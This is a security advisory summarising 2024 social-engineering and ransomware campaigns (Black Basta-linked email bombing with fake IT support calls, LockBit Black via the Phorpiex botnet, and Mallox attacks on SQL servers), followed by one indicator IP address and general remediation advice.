Analysis Summary

A sophisticated social engineering campaign targeting enterprises through a combination of spam emails and phone calls. The campaign which began in late April 2024, aims to overwhelm users' email systems with spam, primarily through legitimate newsletter sign-up confirmations.

Following the email bombardment, attackers masquerade as IT support personnel contacting victims via phone and instructing them to install remote monitoring and management software like AnyDesk or Microsoft's Quick Assist. This social engineering tactic is designed to gain remote access to victims' systems under the pretense of resolving the email issues.

Cybersecurity researchers have uncovered that once remote access is established, attackers use batch scripts to download additional malicious payloads, including a legitimate copy of OpenSSH for Windows. This allows the attackers to open a reverse shell back to their command-and-control (C2) server, thereby maintaining persistent access to the compromised systems.

In one observed incident, the attackers attempted to deploy Cobalt Strike beacons, a powerful post-exploitation tool, across the network. Although these attempts were unsuccessful, the activity shares indicators with the notorious Black Basta ransomware group, hinting at a potential connection.

In parallel, researchers have identified a new campaign involving the LockBit Black ransomware, which leverages the Phorpiex botnet to distribute ransomware payloads via email. This campaign, which started on April 24, has seen millions of emails sent out, indicating a high-volume attack. The LockBit Black ransomware, built from a leaked builder combines sophisticated ransomware capabilities with the widespread reach of the Phorpiex botnet significantly amplifying the threat's potential impact.

Additionally, cybersecurity analysts have reported on the Mallox ransomware group, which has been actively brute-forcing Microsoft SQL servers to deploy their ransomware via a .NET-based loader named PureCrypter. Operating since at least June 2021, Mallox gained prominence in mid-2022 by adopting a ransomware-as-a-service (RaaS) model and employing a double extortion strategy. The group is known to target various sectors including manufacturing, retail, and technology, with a focus on high-revenue organizations, although their victims are often small to medium-sized enterprises.

Further investigation into Mallox's infrastructure has revealed a well-organized group with various roles including Admin, Support, Maestro, Team, Neuroframe, Panda, Grindr, Hiervos, and Vampire. This organizational structure indicates a high level of sophistication and coordination, with different members likely responsible for various aspects of the ransomware operations from technical execution to victim negotiation and support.

The convergence of these campaigns highlights the evolving tactics of cybercriminal groups who are increasingly blending social engineering with technical exploits to maximize their impact. The overlap between different threat actors, such as the connections between FIN7, Black Basta, and LockBit Black underscores the complexity of modern cyber threats and the necessity for robust, multi-layered cybersecurity defenses.

Impact

• Unauthorized Access
• Sensitive Data Theft

Indicators of Compromise

Domain Name

IP

• 5.161.245.155

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Never trust or open links and attachments received from unknown sources/senders.
• Implement multi-factor authentication to add an extra layer of security to login processes.
• Regularly monitor network activity for any unusual behavior, as this may indicate that a cyberattack is underway.
• Organizations need to stay vigilant and follow best practices for cybersecurity to protect their systems and data from potential threats. This includes regularly updating software and implementing strong access controls and monitoring tools.
• Develop a comprehensive incident response plan to respond effectively in case of a security breach or data leakage.
• Maintain regular backups of critical data and systems to ensure data recovery in case of a security incident.
• Adhere to security best practices, including the principle of least privilege, and ensure that users and applications have only the necessary permissions.
• Establish a robust patch management process to ensure that security patches are evaluated, tested, and applied promptly.
• Conduct security audits and assessments to evaluate the overall security posture of your systems and networks.
• Implement network segmentation to contain and isolate potential threats to limit their impact on critical systems.
• Perform comprehensive security audits on the email server infrastructure to identify and address any potential weaknesses. This includes reviewing server configurations, access controls, and encryption protocols to ensure they meet industry best practices.
• Enable 2FA for user accounts on the email server to add an extra layer of security. This prevents unauthorized access even if usernames and passwords are compromised.